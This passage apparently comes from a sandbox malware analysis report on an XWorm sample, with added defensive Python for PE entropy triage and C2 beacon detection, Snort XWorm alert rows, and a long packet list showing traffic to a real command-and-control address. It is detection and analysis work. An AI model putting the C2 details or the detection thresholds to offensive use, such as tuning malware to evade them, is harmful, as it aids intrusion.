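        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    opt = coff + 20
    is_pe32 = struct.unpack_from("<H", blob, opt)[0] == 0x10B   # 0x20B would be PE32+
    num_dirs = struct.unpack_from("<I", blob, opt + (92 if is_pe32 else 108))[0]
    dirs_at = opt + (96 if is_pe32 else 112)
    clr_rva = 0
    if num_dirs > CLR_DIRECTORY:
        clr_rva = struct.unpack_from("<I", blob, dirs_at + 8 * CLR_DIRECTORY)[0]
    sections = []
    for i in range(num_sections):
        hdr = opt + opt_size + 40 * i
        name = blob[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", blob, hdr + 8)
        flags = struct.unpack_from("<I", blob, hdr + 36)[0]
        sections.append({
            "name": name, "va": va, "vsize": vsize, "raw_size": raw_size,
            "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
            "entropy": shannon_entropy(blob[raw_ptr:raw_ptr + raw_size]),
        })
    return sections, clr_rva != 0


def triage(blob: bytes, threshold: float = ENTROPY_THRESHOLD) -> dict:
    """Flag executable sections whose entropy suggests packed or encrypted content."""
    sections, managed = parse_pe_sections(blob)
    suspicious = [f"{s['name']}: executable, entropy {s['entropy']:.2f}"
                  for s in sections if s["executable"] and s["entropy"] >= threshold]
    return {"managed": managed, "sections": sections, "suspicious": suspicious}


def build_pe(sections, with_clr=True) -> bytes:
    """Constructed test input: a structurally valid PE32 image (not runnable) from (name, bytes, flags) tuples."""
    SECT_ALIGN, FILE_ALIGN = 0x1000, 0x200
    opt_size = 96 + 16 * 8                                   # PE32 optional header with 16 data directories
    headers = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    headers = -(-headers // FILE_ALIGN) * FILE_ALIGN
    table, raw, va, raw_ptr = b"", b"", SECT_ALIGN, headers
    for name, data, flags in sections:
        raw_size = -(-len(data) // FILE_ALIGN) * FILE_ALIGN
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), va, raw_size, raw_ptr, 0, 0, 0, 0, flags)
        raw += data.ljust(raw_size, b"\0")
        va += max(SECT_ALIGN, -(-len(data) // SECT_ALIGN) * SECT_ALIGN)
        raw_ptr += raw_size
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)  # magic ... NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    if with_clr:
        dirs[CLR_DIRECTORY] = (0x2008, 0x48)                             # same RVA/size as the sample's CLR header
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    return (dos + b"PE\0\0" + coff + opt + table).ljust(headers, b"\0") + raw


if __name__ == "__main__":
    # A uniform byte distribution in .text gives entropy 8.0, the extreme of what the sample's 7.23 hints at.
    image = build_pe([(".text", bytes(range(256)) * 16, 0x60000020), (".rsrc", b"A" * 512, 0x40000040)])
    for key, value in triage(image).items():
        print(key, value)
```

Run against a real file with `triage(open(path, "rb").read())`; a managed executable whose .text entropy is near 7 or above, as here, is worth unpacking before any string-based rule is trusted.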
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/21/24-23:26:43.756948 | TCP | 2852874 | ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
04/21/24-23:23:14.441038 | TCP | 2855924 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
04/21/24-23:27:02.685039 | TCP | 2852870 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
04/21/24-23:27:02.686118 | TCP | 2852923 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
04/21/24-23:26:01.631776 | TCP | 2853193 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
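The Snort alerts mark individual PING commands on the 192.168.2.4:49730 to 57.128.155.22:8896 connection; the packet list that follows shows the cadence behind them, with the bot opening a short exchange roughly every 10.7 s and the server sending an unsolicited packet every 30 s. The script below is an added example, not Joe Sandbox's code and not part of the report, that recovers that cadence from a packet list without any payload signature: a packet counts as an initiation when no opposite-direction packet preceded it within a short window (so replies and ACKs drop out), and the initiation intervals per direction are summarised by their median and relative median absolute deviation. The input is a constructed tab-separated subset of the report's own packet rows; the 0.5 s reply window, the 5 % jitter limit and the minimum of three intervals are assumed tuning values.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample: a subset of the report's TCP packet rows, one packet per line, tab-separated
# in the report's column order (timestamp, source port, destination port, source IP, destination IP).
SAMPLE = """\
Apr 21, 2024 23:23:03.372555017 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:03.569631100 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:03.744055986 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:03.982362032 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:13.622119904 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:13.677329063 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:14.441037893 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:14.653438091 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:25.115336895 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:25.326075077 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:35.802908897 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:36.001081944 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:43.624783039 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:43.677382946 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:46.491039038 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:46.693980932 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:23:57.177817106 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:23:57.382275105 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:24:13.631813049 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:24:13.677462101 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:24:43.838212967 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:24:43.880637884 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
Apr 21, 2024 23:25:13.858192921 CEST\t8896\t49730\t57.128.155.22\t192.168.2.4
Apr 21, 2024 23:25:13.912187099 CEST\t49730\t8896\t192.168.2.4\t57.128.155.22
"""

SOLICIT_WINDOW = 0.5   # s; assumption: a packet this soon after an opposite-direction packet is a reply or ACK
MAX_REL_JITTER = 0.05  # assumption: MAD/median of initiation intervals below this counts as periodic
MIN_INTERVALS = 3      # assumption: fewer intervals than this is too little to call a cadence
MONTHS = {m: i for i, m in enumerate("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}
EPOCH = datetime(1970, 1, 1)


def parse_ts(text: str) -> float:
    """'Apr 21, 2024 23:23:03.372555017 CEST' -> seconds. The nine-digit fraction is split off by hand
    (strptime's %f stops at six digits); the zone suffix is dropped because every row shares it."""
    mon, day, year, clock, _zone = text.replace(",", "").split()
    hms, frac = clock.split(".")
    h, m, s = (int(x) for x in hms.split(":"))
    whole = (datetime(int(year), MONTHS[mon], int(day), h, m, s) - EPOCH).total_seconds()
    return whole + int(frac) / 10 ** len(frac)


def parse_packets(text: str):
    """Return (time, src_endpoint, dst_endpoint) tuples, oldest first."""
    pkts = []
    for line in text.splitlines():
        if line.strip():
            ts, sport, dport, src, dst = line.split("\t")
            pkts.append((parse_ts(ts), f"{src}:{sport}", f"{dst}:{dport}"))
    return sorted(pkts)


def initiations(pkts):
    """Per direction, times of packets the other side did not provoke: nothing came the opposite way
    within SOLICIT_WINDOW before them. Replies and TCP ACKs fall out of the series here."""
    last_in_direction = {}
    starts = defaultdict(list)
    for t, src, dst in pkts:
        prev_opposite = last_in_direction.get((dst, src))
        if prev_opposite is None or t - prev_opposite > SOLICIT_WINDOW:
            starts[(src, dst)].append(t)
        last_in_direction[(src, dst)] = t
    return starts


def beacon_stats(times) -> dict:
    """Median interval and relative jitter (MAD/median) of a series of initiation times; the median/MAD
    pair is robust to a one-off outlier such as the initial connect before the first beacon."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    if len(gaps) < MIN_INTERVALS:
        return {"initiations": len(times), "intervals": len(gaps), "periodic": False}
    med = median(gaps)
    jitter = median(abs(g - med) for g in gaps) / med if med > 0 else float("inf")
    return {"initiations": len(times), "intervals": len(gaps), "median_interval": med,
            "rel_jitter": jitter, "periodic": jitter < MAX_REL_JITTER}


def analyse(text: str) -> dict:
    """Beacon statistics keyed by 'src -> dst' for every direction seen in the packet list."""
    return {f"{src} -> {dst}": beacon_stats(ts)
            for (src, dst), ts in initiations(parse_packets(text)).items()}


if __name__ == "__main__":
    for direction, stats in analyse(SAMPLE).items():
        print(direction, stats)
```

On the sample rows this reports a periodic client beacon with a median interval near 10.7 s and a periodic server-side keepalive near 30 s; the same logic applied to NetFlow or Zeek conn records catches the cadence even when the XWorm payload is encrypted and no ETPRO signature fires.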
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 21, 2024 23:23:03.372555017 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:03.569631100 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:03.569751024 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:03.744055986 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:03.982362032 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:13.622119904 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:13.677329063 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:14.441037893 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:14.653438091 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:14.656141996 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:14.893460035 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:25.115336895 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:25.326075077 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:25.328269958 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:25.565290928 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:35.802908897 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:36.001081944 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:36.004924059 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:36.242527962 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:43.624783039 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:43.677382946 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:46.491039038 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:46.693980932 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:46.698088884 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:46.936300039 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:57.177817106 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:57.382275105 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:23:57.386032104 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:23:57.623375893 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:03.287004948 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:03.489339113 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:03.491452932 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:03.728630066 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:05.615314007 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:05.819125891 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:05.820583105 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:06.058979988 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:07.818308115 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:08.032133102 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:08.037156105 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:08.275115967 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:13.631813049 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:13.677462101 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:18.505767107 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:18.705950022 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:18.707484961 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:18.953938007 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:23.149889946 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:23.369520903 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:23.374878883 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:23.611116886 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:31.865227938 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:32.065583944 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:32.068551064 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:32.305314064 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:35.865466118 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:36.075592041 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:36.077763081 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:36.319375038 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:43.838212967 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:43.880637884 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:44.177797079 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:44.397531986 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:44.399211884 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:44.637353897 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:47.256289005 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:47.454758883 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:47.457797050 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:47.694945097 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:52.802843094 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:53.000772953 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:53.000927925 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:53.216415882 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:53.216655016 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:53.436222076 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:53.436364889 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:53.677815914 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:53.677891016 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:53.917680025 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:56.646600008 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:56.847608089 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:24:56.849386930 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:24:57.087912083 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:02.396760941 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:02.595947981 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:02.600737095 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:02.837860107 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:05.271725893 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:05.470650911 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:05.472330093 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:05.712244034 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:13.858192921 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:13.912187099 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:14.959889889 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:15.159610033 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:15.162328005 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:15.400275946 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:25.646917105 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:25.845801115 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:25.850166082 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:26.086821079 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:28.834573984 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
Apr 21, 2024 23:25:29.033370018 CEST | 8896 | 49730 | 57.128.155.22 | 192.168.2.4
Apr 21, 2024 23:25:29.034898996 CEST | 49730 | 8896 | 192.168.2.4 | 57.128.155.22
                                        Apr 21, 2024 23:25:29.273413897 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:30.256372929 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:30.483460903 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:30.485003948 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:30.723738909 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:36.100123882 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:36.298695087 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:36.300127983 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:36.537247896 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:43.533736944 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:43.584323883 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:46.790811062 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:46.988955975 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:46.991215944 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:47.228734970 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:57.240961075 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:57.439332962 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:57.441339016 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:57.679769993 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:01.631776094 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:01.829998970 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:01.830071926 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.027967930 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.028460026 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.225863934 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.228419065 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.425661087 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.425832033 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.668462992 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.668620110 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.906622887 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:08.084995985 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:08.283586025 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:08.285370111 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:08.524384975 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:13.747680902 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:13.912720919 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:14.047055006 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:14.047133923 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:18.772455931 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:18.971230030 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:18.974659920 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:19.213866949 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:23.475698948 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:23.679619074 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:23.728462934 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:23.853245020 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:24.091512918 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:26.163173914 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:26.400296926 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:26.421097040 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:26.422986984 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:26.661381006 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:28.241239071 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:28.443537951 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:28.445575953 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:28.682708979 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:30.725956917 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:30.923717022 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:30.923799038 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:31.121428013 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:31.126522064 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:31.364308119 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:31.366918087 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:31.607069969 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.241244078 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:33.439599037 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.441183090 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:33.678348064 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.678469896 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:33.877882957 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.882816076 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:34.120840073 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:36.226013899 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:36.426326990 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:36.431091070 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:36.668994904 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:43.756947994 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:43.803817034 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:46.616436958 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:46.814907074 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:46.816431999 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:47.053190947 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:49.492536068 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:49.729532957 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:49.770524025 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:49.772306919 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:50.013292074 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:50.538310051 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:50.760000944 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:50.761746883 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:50.999877930 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:56.944940090 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:57.183329105 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:57.754271984 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:57.756340981 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:57.994399071 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:27:02.476038933 CEST497308896192.168.2.457.128.155.22
